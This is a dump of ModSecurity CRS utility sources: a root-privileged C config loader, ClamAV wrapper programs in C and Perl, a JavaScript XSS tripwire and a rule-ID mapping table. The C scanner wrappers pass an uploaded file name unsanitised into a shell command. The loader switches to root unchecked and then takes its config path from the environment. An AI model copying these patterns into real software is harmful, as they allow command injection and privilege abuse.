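    { "MODSEC_PROXY_EXT_NIC",             modsec_proxy_ext_nic,             sizeof modsec_proxy_ext_nic },
    { "MODSEC_PROXY_PID",                 modsec_proxy_pid,                 sizeof modsec_proxy_pid },
    { "MODSEC_PROXY_WHITELIST",           modsec_proxy_whitelist,           sizeof modsec_proxy_whitelist },
    { "MODSEC_PROXY_BLACKLIST",           modsec_proxy_blacklist,           sizeof modsec_proxy_blacklist },
    { "MODSEC_PROXY_TIMEOUT",             modsec_proxy_timeout,             sizeof modsec_proxy_timeout },
    { "MODSEC_PROXY_EXCHANGE",            modsec_proxy_exchange,            sizeof modsec_proxy_exchange },
    { "MODSEC_PROXY_EXT_IPS",             modsec_proxy_ext_ips,             sizeof modsec_proxy_ext_ips },
    { "MODSEC_MUI_UI_ADMIN",              modsec_mui_ui_admin,              sizeof modsec_mui_ui_admin },
    { "MODSEC_RPC_PASSWORD_FILE",         modsec_rpc_password_file,         sizeof modsec_rpc_password_file },
    { "MODSEC_MUI_UI_IPADDRESS",          modsec_mui_ui_ipaddress,          sizeof modsec_mui_ui_ipaddress },
    { "MODSEC_MUI_UI_PORT",               modsec_mui_ui_port,               sizeof modsec_mui_ui_port },
    { "SENSOR_ID",                        sensor_id,                        sizeof sensor_id },
    { "SERIAL",                           serial,                           sizeof serial },
    { "VERSION_NUMBER",                   version_number,                   sizeof version_number },
    { "RELEASE_DATE",                     release_date,                     sizeof release_date },
    { "BRIDGE_MODE",                      bridge_mode,                      sizeof bridge_mode },
    { "DATA_DISK_SPACE",                  data_disk_space,                  sizeof data_disk_space },
    { "CONN_RATE",                        conn_rate,                        sizeof conn_rate },
    { "CONN_RATE_PER_ADDR",               conn_rate_per_addr,               sizeof conn_rate_per_addr },
    { "CONNS",                            conns,                            sizeof conns },
    { "CONNS_PER_ADDR",                   conns_per_addr,                   sizeof conns_per_addr },
    { "MODSEC_RPC",                       modsec_rpc,                       sizeof modsec_rpc },
    { "MODSEC_PROXY",                     modsec_proxy,                     sizeof modsec_proxy },
    { "MODSEC_PROXY_SCRIPT",              modsec_proxy_script,              sizeof modsec_proxy_script }
  };
  size_t k;
  int idx, num_of_params;
  parameter_t parameters[MAX_PARAMS];

  num_of_params = parse_file(filename, parameters, MAX_PARAMS);

  for (k = 0; k < sizeof settings / sizeof settings[0]; k++) {
    idx = find_param_idx(settings[k].name, parameters, num_of_params);
    if (idx < 0)
      continue;
    /* Bounded copy: the destination's own size is the limit, so the copy
       stays inside the global even if a value arrives unterminated. */
    strncpy(settings[k].dest, parameters[idx].value, settings[k].size - 1);
    settings[k].dest[settings[k].size - 1] = '\0';
  }

  return num_of_params;
}

/*
 * Prepare the process for serving a request: switch to uid/gid 0, install
 * the built-in defaults, then overlay them with a configuration file.
 *
 * The file is the one named by the MODSEC environment variable when that is
 * set; otherwise /opt/breach/etc/modsec.conf, and /etc/modsec.conf if the
 * former yields no parameters.
 *
 * Always returns 0.
 *
 * NOTE(review): the results of setresuid()/setresgid() are not checked, and
 * after the switch to uid 0 the configuration path is taken from the
 * environment.  The loaded values include paths of programs and scripts, so
 * whoever can set MODSEC for this process decides what those point to --
 * confirm that only the web server configuration can set it.
 */
int init_cgi()
{
  char *modsec;

  setresuid(0,0,0);
  setresgid(0,0,0);

  strcpy(modsec_cli_home,"/opt/modsecurity-cli");
  strcpy(modsec_rpc_home,"/opt/modsecurity-rpc");
  strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log");
  strcpy(modsec_rpc_log_level,"0");
  strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock");
  strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock");
  strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock");
  strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock");
  strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock");
  strcpy(modsec_proxy_home,"/opt/modsecurity-proxy");
  strcpy(modsec_proxy_ip,"127.0.0.2");
  strcpy(modsec_proxy_port,"80");
  strcpy(modsec_proxy_bin,"/bin/modsec-proxyd");
  strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy");
  strcpy(modsec_proxy_conf,"/etc/httpd.conf");
  strcpy(modsec_proxy_ext_nic,"eth0");
  strcpy(modsec_proxy_network_prefix,"172.16.0.0/12");
  strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid");
  strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf");
  strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf");
  strcpy(modsec_proxy_timeout,"120");
  strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange");
  strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf");
  strcpy(modsec_mui_ui_ipaddress,"127.0.0.1");
  strcpy(modsec_mui_ui_port,"443");
  strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd");
  strcpy(modsec_mui_ui_admin,"admin");
  strcpy(sensor_id,"1");
  strcpy(serial,"1");
  strcpy(version_number,"2.0");
  strcpy(bridge_mode,"off");
  strcpy(data_disk_space,"60");
  strcpy(release_date,"11-15-2006");
  strcpy(conn_rate,"0");
  strcpy(conn_rate_per_addr,"0");
  strcpy(conns,"0");
  strcpy(conns_per_addr,"0");

  modsec = getenv("MODSEC");
  if (modsec != 0) {
    read_conf_file(modsec);
  } else if (!read_conf_file("/opt/breach/etc/modsec.conf")) {
    /* Nothing was read from the first location; try the second one. */
    read_conf_file("/etc/modsec.conf");
  }

  return 0;
}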
������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/common.h�����������������������������������������������0000775�0000000�0000000�00000006765�14461225151�0022555�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include #include #include #include #include #include #include #include #include #include #include #include #include #define MAX_PARAMS 256 #define MAX_IPS 256 #define MAX_NAME_LENGTH 256 #define MAX_VALUE_LENGTH 1024 #define MAX_CMD_LENGTH 1024 #define MAX_TOKEN_LENGTH 1024 #define MAX_OUTPUT_LINE_LEN (1024) #define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) #define WHITE 1 #define BLACK 0 #define NONE 0 #define DEBUG 1 typedef struct { char name[MAX_NAME_LENGTH]; char value[MAX_VALUE_LENGTH]; } parameter_t; typedef struct { char ip[16]; time_t start; long duration; time_t end; char token[MAX_TOKEN_LENGTH]; } blocklist_t; EXTERN int lock_file(char *filename); EXTERN int unlock_file(int fd); EXTERN int print_reply(char *reply); EXTERN int print_error(char *func1, char* func2, char* str, int err); EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); EXTERN int is_proxy_up(); EXTERN int run_cmd(char *command, char *output, int output_size); EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); EXTERN int parse_query(char *query, parameter_t *parameters, int 
max_parameters); EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); EXTERN int copy_file(char *src_file, char *dst_file); EXTERN int change_file(char *filename, parameter_t parameter); EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); EXTERN int init_cgi(); EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); EXTERN char modsec_rpc[1024]; EXTERN char modsec_rpc_home[1024]; EXTERN char modsec_rpc_log_file[1024]; EXTERN char modsec_rpc_log_level[1024]; EXTERN char modsec_rpc_ssl_lockfile[1024]; EXTERN char modsec_rpc_externalnic_lockfile[1024]; EXTERN char modsec_rpc_sensor_lockfile[1024]; EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; EXTERN char modsec_rpc_mui_lockfile[1024]; EXTERN char modsec_proxy[1024]; EXTERN char modsec_proxy_home[1024]; EXTERN char modsec_proxy_script[1024]; EXTERN char modsec_proxy_ip[1024]; EXTERN char modsec_proxy_port[1024]; EXTERN char modsec_proxy_bin[1024]; EXTERN char modsec_proxy_conf[1024]; EXTERN char modsec_proxy_ext_nic[1024]; EXTERN char modsec_proxy_pid[1024]; EXTERN char modsec_proxy_whitelist[1024]; EXTERN char modsec_proxy_blacklist[1024]; EXTERN char modsec_proxy_network_prefix[1024]; EXTERN char modsec_proxy_timeout[1024]; EXTERN char modsec_proxy_exchange[1024]; EXTERN char modsec_proxy_ext_ips[1024]; EXTERN char modsec_rpc_password_file[1024]; EXTERN char modsec_mui_ui_admin[1024]; EXTERN char modsec_mui_ui_ipaddress[1024]; EXTERN char modsec_mui_ui_port[1024]; EXTERN char modsec_cli_home[1024]; EXTERN char sensor_id[1024]; EXTERN char serial[1024]; EXTERN char version_number[1024]; EXTERN char bridge_mode[1024]; EXTERN char data_disk_space[1024]; EXTERN char release_date[1024]; EXTERN char conn_rate[1024]; EXTERN char conn_rate_per_addr[1024]; EXTERN 
char conns[1024]; EXTERN char conns_per_addr[1024]; �����������modsecurity-crs-3.3.5/util/av-scanning/runAV/comp���������������������������������������������������0000775�0000000�0000000�00000000124�14461225151�0021754�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������gcc -c -o common.o -DEXTERN= common.c gcc -o runAV -DEXTERN=extern common.o runAV.c ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/runAV-clamd.c������������������������������������������0000775�0000000�0000000�00000002367�14461225151�0023363�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" main(int argc, char *argv[]) { char cmd[MAX_OUTPUT_SIZE]; char output[MAX_OUTPUT_SIZE]; int error; char *colon; char *keyword; if (argc > 1) { sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]); output[0] = '\0'; error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { printf ("1 exec empty: OK"); } 
else { colon = strstr(output, ":"); if (colon) { colon += 2; } if (!colon) { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } else if (keyword = strstr(colon, " FOUND")) { *keyword = '\0'; printf ("0 clamdscan: %s", colon); } else if (keyword = strstr(colon, " ERROR")) { *keyword = '\0'; printf ("0 clamdscan: %s", colon); } else if (keyword = strstr(colon, "OK")) { printf ("1 clamdscan: OK"); } else if (keyword = strstr(colon, "Empty file")) { printf ("1 empty file"); } else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } else { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } } } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/runAV.c������������������������������������������������0000775�0000000�0000000�00000002361�14461225151�0022277�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "common.h" main(int argc, char *argv[]) { char cmd[MAX_OUTPUT_SIZE]; char output[MAX_OUTPUT_SIZE]; int error; char *colon; char *keyword; if (argc > 1) { sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]); output[0] = '\0'; error = run_cmd(cmd,output,MAX_OUTPUT_SIZE); if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); if (colon) { colon += 2; } if (!colon) { printf ("0 unable to parse clamscan output 
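[%s] for cmd [%s]", output, cmd); } else if (keyword = strstr(colon, " FOUND")) { *keyword = '\0'; printf ("0 clamscan: %s", colon); } else if (keyword = strstr(colon, " ERROR")) { *keyword = '\0'; printf ("0 clamscan: %s", colon); } else if (keyword = strstr(colon, "OK")) { printf ("1 clamscan: OK"); } else if (keyword = strstr(colon, "Empty file")) { printf ("1 empty file"); } else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } else { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } } } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runav.pl�����������������������������������������������������0000775�0000000�0000000�00000001503�14461225151�0021532�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������
#!/usr/bin/perl
#
# runav.pl
# Copyright (c) 2004-2011 Trustwave
#
# This script is an interface between ModSecurity and its
# ability to intercept files being uploaded through the
# web server, and ClamAV
#
# It takes one argument, the path of the file to scan, and prints one
# verdict line on stdout: "1 ..." for an empty file or an OK result,
# "0 ..." for a detection, a scanner error or output it cannot parse.

use strict;
use warnings;

# Relative name, so the scanner is looked up through PATH.
# NOTE(review): confirm PATH is controlled where this script is run.
my $CLAMSCAN = "clamscan";

if ($#ARGV != 0) {
    print "Usage: modsec-clamscan.pl \n";
    exit;
}

my ($FILE) = shift @ARGV;

# A name that starts with '-' would be read by clamscan as an option;
# prefixing "./" keeps it a file name.
$FILE = "./$FILE" if $FILE =~ /^-/;

# List-form pipe open: clamscan is started directly and the file name is
# handed over as one argument.  The earlier form interpolated the name into
# a string run through backticks, where a shell would interpret any
# metacharacters in it.
my $input = '';
if (open(my $scan, '-|', $CLAMSCAN, '--stdout', '--disable-summary', $FILE)) {
    local $/;                  # read everything clamscan prints
    $input = <$scan>;
    $input = '' unless defined $input;
    close($scan);
}

# Only the first line of the scanner output is evaluated.
my $error_message = '';
if ($input =~ m/^(.+)/) {
    $error_message = $1;
}

# Default verdict; replaced below when the line is recognised.
my $output = "0 Unable to parse clamscan output [$error_message]";

if ($error_message =~ m/: Empty file\.?$/) {
    $output = "1 empty file";
}
elsif ($error_message =~ m/: (.+) ERROR$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: (.+) FOUND$/) {
    $output = "0 clamscan: $1";
}
elsif ($error_message =~ m/: OK$/) {
    $output = "1 clamscan: OK";
}

print "$output\n";
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/browser-tools/�����������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020455�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/browser-tools/js-overrides.js��������������������������������������������0000664�0000000�0000000�00000004364�14461225151�0023436�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(function() { // don't leak XSSTripwire into global ns /* Assumptions: - we need to run first, before any other attacker script - we can't prevent tripwire from being detected (e.g. 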
by side effects) Todo: - a lot more in lockdown - protect XHR */ var XSSTripwire = new Object(); XSSTripwire.report = function() { // Notify server var notify = XSSTripwire.newXHR(); // Create a results string to send back var results; try { results = "HTML=" + encodeURIComponent(document.body.outerHTML); } catch (e) {} // we don't always have document.body notify.open("POST", XSSTripwire.ReportURL, true); notify.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); notify.send(results); } XSSTripwire.lockdown = function(obj, name) { if (Object.defineProperty) { Object.defineProperty(obj, name, { configurable: false }) } } XSSTripwire.newXHR = function() { var xmlreq = false; if (window.XMLHttpRequest) { xmlreq = new XMLHttpRequest(); } else if (window.ActiveXObject) { // Try ActiveX try { xmlreq = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e1) { // first method failed try { xmlreq = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e2) { // both methods failed } } } return xmlreq; }; XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function() { // URL of the page to notify, in the event of a detected XSS event: XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); XSSTripwire.report(); if (exec_original) { return proxy.apply(this, arguments); } }; XSSTripwire.lockdown(obj, name); }; XSSTripwire.proxy(window, 'alert', 'window.alert', true); XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); XSSTripwire.proxy(window, 'unescape', 'unescape', true); XSSTripwire.proxy(document, 'write', 'document.write', true); XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); })(); 
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/crs2-renumbering/��������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021020�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/crs2-renumbering/IdNumbering.csv�����������������������������������������0000664�0000000�0000000�00000036770�14461225151�0023755�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������200000,000000 200121,000000 200273,000000 200280,000000 200281,000000 200287,000000 200289,000000 200290,000000 200299,000000 200316,000000 200333,000000 200337,000000 200350,000000 200351,000000 200366,000000 200367,000000 200368,000000 200369,000000 200370,000000 200371,000000 200372,000000 200373,000000 200374,000000 200375,000000 200376,000000 200377,000000 200378,000000 200379,000000 200381,000000 200382,000000 200383,000000 200384,000000 200385,000000 200386,000000 200387,000000 200388,000000 200389,000000 200390,000000 200391,000000 200392,000000 200394,000000 200395,000000 200396,000000 200397,000000 200398,000000 200399,000000 200400,000000 200401,000000 200402,000000 200403,000000 
200404,000000 200405,000000 200406,000000 200407,000000 200408,000000 200409,000000 200410,000000 200411,000000 200412,000000 200413,000000 200414,000000 200415,000000 200416,000000 200417,000000 200418,000000 200419,000000 200420,000000 200421,000000 200422,000000 200423,000000 200424,000000 200425,000000 200426,000000 200427,000000 200428,000000 200429,000000 200430,000000 200431,000000 200432,000000 200433,000000 200434,000000 200435,000000 200436,000000 200437,000000 200438,000000 200439,000000 200440,000000 200441,000000 200442,000000 200443,000000 200445,000000 200446,000000 200447,000000 200448,000000 200449,000000 200450,000000 200451,000000 200452,000000 200453,000000 200454,000000 200455,000000 200456,000000 200457,000000 200458,000000 200459,000000 200460,000000 200461,000000 200462,000000 200463,000000 200464,000000 200465,000000 200466,000000 200467,000000 200468,000000 200469,000000 200470,000000 200471,000000 200472,000000 200473,000000 200474,000000 200475,000000 200476,000000 200477,000000 200478,000000 200479,000000 200480,000000 200481,000000 200482,000000 200483,000000 200484,000000 200485,000000 200486,000000 200487,000000 200488,000000 200489,000000 200490,000000 200491,000000 200492,000000 200493,000000 200494,000000 200495,000000 200496,000000 200497,000000 200498,000000 200499,000000 200500,000000 200501,000000 200502,000000 200503,000000 200504,000000 200505,000000 200506,000000 200507,000000 200508,000000 200509,000000 200510,000000 200511,000000 200512,000000 200513,000000 200514,000000 200515,000000 200516,000000 200517,000000 200518,000000 200519,000000 200520,000000 200521,000000 200522,000000 200523,000000 200524,000000 200525,000000 200526,000000 200527,000000 200528,000000 200529,000000 200530,000000 200532,000000 200533,000000 200534,000000 200535,000000 200536,000000 200537,000000 200538,000000 200539,000000 200540,000000 200541,000000 200542,000000 200543,000000 200544,000000 200545,000000 200546,000000 200547,000000 
200548,000000 200549,000000 200550,000000 200551,000000 200552,000000 200553,000000 200554,000000 200555,000000 200556,000000 200557,000000 200558,000000 200559,000000 200560,000000 200561,000000 200562,000000 200563,000000 200564,000000 200565,000000 200566,000000 200567,000000 200568,000000 200569,000000 200570,000000 200571,000000 200572,000000 200573,000000 200574,000000 200575,000000 200576,000000 200577,000000 200578,000000 200579,000000 200580,000000 200581,000000 200582,000000 200583,000000 200584,000000 200585,000000 200586,000000 200587,000000 200588,000000 200589,000000 200590,000000 200591,000000 200592,000000 200593,000000 200594,000000 200595,000000 200596,000000 200597,000000 200598,000000 200599,000000 200600,000000 200601,000000 200602,000000 200603,000000 200604,000000 200605,000000 200606,000000 200607,000000 200608,000000 200609,000000 200610,000000 200611,000000 200612,000000 200613,000000 200614,000000 200615,000000 200616,000000 200617,000000 200618,000000 200619,000000 200620,000000 200621,000000 200622,000000 200623,000000 200624,000000 200625,000000 200626,000000 200627,000000 200628,000000 200629,000000 200630,000000 200631,000000 200632,000000 200633,000000 200634,000000 200635,000000 200645,000000 200646,000000 200647,000000 200648,000000 200649,000000 200650,000000 200651,000000 200652,000000 200653,000000 200654,000000 200655,000000 200656,000000 200657,000000 200658,000000 200659,000000 200660,000000 200661,000000 200662,000000 200663,000000 200664,000000 200665,000000 200666,000000 200667,000000 200668,000000 200669,000000 200670,000000 200671,000000 200673,000000 200674,000000 200675,000000 200676,000000 200677,000000 200678,000000 200679,000000 200680,000000 200681,000000 200682,000000 200683,000000 200684,000000 200685,000000 200686,000000 200687,000000 200688,000000 200689,000000 200690,000000 200692,000000 200693,000000 200694,000000 200695,000000 200696,000000 200697,000000 200698,000000 200699,000000 200700,000000 
200701,000000 200702,000000 200703,000000 200704,000000 200705,000000 200706,000000 200707,000000 200708,000000 200709,000000 200710,000000 200711,000000 200712,000000 200713,000000 200714,000000 200718,000000 200719,000000 200720,000000 200721,000000 200722,000000 200723,000000 200724,000000 200725,000000 200726,000000 200727,000000 200728,000000 200729,000000 200730,000000 200731,000000 200732,000000 200733,000000 200734,000000 200735,000000 200736,000000 200737,000000 200738,000000 200739,000000 200740,000000 200741,000000 200742,000000 200743,000000 200744,000000 200745,000000 200746,000000 200747,000000 200748,000000 200749,000000 200751,000000 200752,000000 200753,000000 200754,000000 200755,000000 200756,000000 200789,000000 200865,000000 200868,000000 200872,000000 200882,000000 200883,000000 200884,000000 200885,000000 200887,000000 200888,000000 200889,000000 200890,000000 200892,000000 200893,000000 200896,000000 200897,000000 200899,000000 200901,000000 200905,000000 200906,000000 200907,000000 200908,000000 200910,000000 200912,000000 200914,000000 200916,000000 200917,000000 200918,000000 200919,000000 200922,000000 200923,000000 200930,000000 200931,000000 200932,000000 200933,000000 200936,000000 200937,000000 200938,000000 200939,000000 200941,000000 200942,000000 200943,000000 200945,000000 200946,000000 200950,000000 200959,000000 200964,000000 200965,000000 200966,000000 200967,000000 200969,000000 200971,000000 200972,000000 200973,000000 200974,000000 200975,000000 200976,000000 200978,000000 200979,000000 200983,000000 200984,000000 200987,000000 200988,000000 200989,000000 200990,000000 200991,000000 200992,000000 200993,000000 200994,000000 200995,000000 200996,000000 200997,000000 200999,000000 201001,000000 201002,000000 201003,000000 201004,000000 201007,000000 201008,000000 201009,000000 201012,000000 201013,000000 201014,000000 201016,000000 201017,000000 201018,000000 201019,000000 201020,000000 201022,000000 201025,000000 
201026,000000 201027,000000 201034,000000 201035,000000 201036,000000 201046,000000 201047,000000 201048,000000 201055,000000 201056,000000 201061,000000 201062,000000 201063,000000 201064,000000 201065,000000 201066,000000 201070,000000 201071,000000 201072,000000 201075,000000 201077,000000 201078,000000 201080,000000 201083,000000 201084,000000 201085,000000 201086,000000 201092,000000 201094,000000 201095,000000 201097,000000 201098,000000 201099,000000 201100,000000 201101,000000 201102,000000 201104,000000 201105,000000 201106,000000 201107,000000 201108,000000 201109,000000 201110,000000 201111,000000 201113,000000 201114,000000 201115,000000 201116,000000 201117,000000 201119,000000 201120,000000 201121,000000 201125,000000 201126,000000 201127,000000 201137,000000 201138,000000 201142,000000 201145,000000 201155,000000 201156,000000 201157,000000 201166,000000 201167,000000 201172,000000 201173,000000 201182,000000 201183,000000 201184,000000 201185,000000 201187,000000 201188,000000 201192,000000 201193,000000 201194,000000 201195,000000 201200,000000 201201,000000 201202,000000 201203,000000 201204,000000 201206,000000 201207,000000 201209,000000 201212,000000 201213,000000 201216,000000 201218,000000 201219,000000 201221,000000 201222,000000 201233,000000 201234,000000 201235,000000 201236,000000 201237,000000 201238,000000 201239,000000 201240,000000 201241,000000 201242,000000 201243,000000 201247,000000 201248,000000 201249,000000 201256,000000 201257,000000 201258,000000 201260,000000 201265,000000 201266,000000 201267,000000 201268,000000 201269,000000 201270,000000 201271,000000 201272,000000 201274,000000 201275,000000 201279,000000 201282,000000 201283,000000 201287,000000 201288,000000 201294,000000 201295,000000 201299,000000 201308,000000 201309,000000 201310,000000 201311,000000 201312,000000 201313,000000 201315,000000 201322,000000 201323,000000 201330,000000 201331,000000 201342,000000 201343,000000 201346,000000 201347,000000 
900001,000000 900002,000000 900003,000000 900004,000000 900005,000000 900006,000000 900007,000000 900008,000000 900009,000000 900010,000000 900011,000000 900012,000000 900013,000000 900014,000000 900015,000000 900016,000000 900017,000000 900018,000000 900019,000000 900020,000000 900021,000000 900030,000000 900031,000000 900032,000000 900033,000000 900034,000000 900035,000000 900036,000000 900037,000000 900038,000000 900039,000000 900040,000000 900041,000000 900042,000000 900043,000000 900044,000000 900045,000000 900046,000000 900047,000000 900048,000000 900050,910100 900051,910110 900051,910120 910006,000000 910007,000000 910008,000000 920005,000000 920006,000000 920007,000000 920008,000000 920009,000000 920010,000000 920011,000000 920012,000000 920013,000000 920014,000000 920015,000000 920016,000000 920017,000000 920018,000000 920019,000000 920020,000000 920021,000000 920022,000000 920023,000000 950000,943120 950001,942150 950002,000000 950003,943110 950005,930120 950006,000000 950007,000000 950008,000000 950009,943100 950010,000000 950011,000000 950012,921100 950018,000000 950019,000000 950020,000000 950103,930100 950104,930110 950107,920220 950108,920240 950109,920230 950110,000000 950115,000000 950116,920260 950117,931100 950118,931110 950119,931120 950120,931130 950801,920250 950901,942130 950907,932100 950908,000000 950910,921120 950911,921130 950912,921140 950913,921150 950914,921160 950915,921110 950921,000000 950922,000000 950923,000000 958000,000000 958001,000000 958002,000000 958003,000000 958004,000000 958005,000000 958006,000000 958007,000000 958008,000000 958009,000000 958010,000000 958011,000000 958012,000000 958013,000000 958016,000000 958017,000000 958018,000000 958019,000000 958020,000000 958022,000000 958023,000000 958024,000000 958025,000000 958026,000000 958027,000000 958028,000000 958030,000000 958031,000000 958032,000000 958033,000000 958034,000000 958036,000000 958037,000000 958038,000000 958039,000000 958040,000000 958041,000000 
958045,000000 958046,000000 958047,000000 958049,000000 958051,000000 958052,000000 958054,000000 958056,000000 958057,000000 958059,000000 958230,920190 958231,920200 958291,000000 958295,920210 958297,000000 958404,000000 958405,000000 958406,000000 958407,000000 958408,000000 958409,000000 958410,000000 958411,000000 958412,000000 958413,000000 958414,000000 958415,000000 958416,000000 958417,000000 958418,000000 958419,000000 958420,000000 958421,000000 958422,000000 958423,000000 958976,000000 958977,933110 958978,933000 958979,933120 958980,933130 959070,942380 959071,942390 959072,942400 959073,942410 959151,933100 960000,920120 960001,000000 960002,000000 960003,000000 960006,920330 960007,920290 960008,920280 960009,920320 960010,920420 960011,920170 960012,920180 960014,000000 960015,920300 960016,920160 960017,920350 960018,000000 960020,000000 960021,920310 960022,000000 960024,942460 960032,911100 960034,920430 960035,920440 960038,920450 960208,920370 960209,920360 960335,920380 960341,920390 960342,920400 960343,920410 960901,920270 960902,000000 960904,920340 960911,920100 960912,920130 960913,000000 960914,920140 960915,920150 970003,951100 970004,954120 970007,000000 970008,000000 970009,953100 970010,000000 970011,000000 970012,000000 970013,950130 970014,952100 970015,953110 970016,000000 970017,952110 970017,954100 970018,000000 970021,000000 970118,954110 970901,950100 970902,953120 970903,000000 970904,954130 973300,941320 973301,000000 973302,000000 973303,000000 973304,000000 973305,000000 973306,000000 973307,000000 973308,000000 973309,000000 973310,000000 973311,000000 973312,000000 973313,000000 973314,000000 973315,941190 973316,000000 973317,941300 973318,941290 973319,941310 973320,941280 973321,941270 973322,941250 973323,941240 973324,941230 973325,000000 973326,941200 973327,000000 973328,000000 973329,000000 973330,000000 973331,000000 973332,941330 973333,941340 973334,000000 973335,000000 973336,941110 973337,941120 
973338,941140 973339,941130 973340,941160 973341,941170 973342,941180 973343,941100 973344,941100 973345,941220 973346,941210 973347,000000 973348,941260 973350,941150 981000,000000 981001,000000 981003,000000 981004,000000 981005,000000 981006,000000 981007,000000 981018,000000 981020,901100 981021,901110 981022,000000 981033,000000 981034,000000 981035,000000 981036,000000 981037,000000 981038,000000 981039,000000 981040,000000 981041,000000 981042,000000 981043,000000 981044,912120 981045,912130 981046,912140 981047,912150 981048,912160 981049,912170 981050,000000 981051,000000 981052,000000 981053,000000 981054,000000 981055,000000 981056,000000 981057,000000 981058,000000 981059,000000 981060,000000 981061,000000 981062,000000 981063,000000 981064,000000 981075,000000 981076,000000 981077,000000 981078,000000 981079,000000 981080,000000 981081,000000 981082,000000 981083,000000 981084,000000 981085,000000 981086,000000 981087,000000 981088,000000 981089,000000 981090,000000 981091,000000 981092,000000 981093,000000 981094,000000 981095,000000 981096,000000 981097,000000 981098,000000 981099,000000 981100,000000 981101,000000 981102,000000 981103,000000 981104,000000 981105,000000 981110,000000 981131,000000 981132,000000 981133,000000 981134,000000 981136,000000 981137,000000 981138,910140 981139,910190 981140,910000 981141,910150 981142,910160 981143,910170 981144,910180 981145,000000 981172,942420 981173,942430 981175,949100 981176,949190 981177,000000 981178,000000 981179,949110 981180,949120 981181,949130 981182,949140 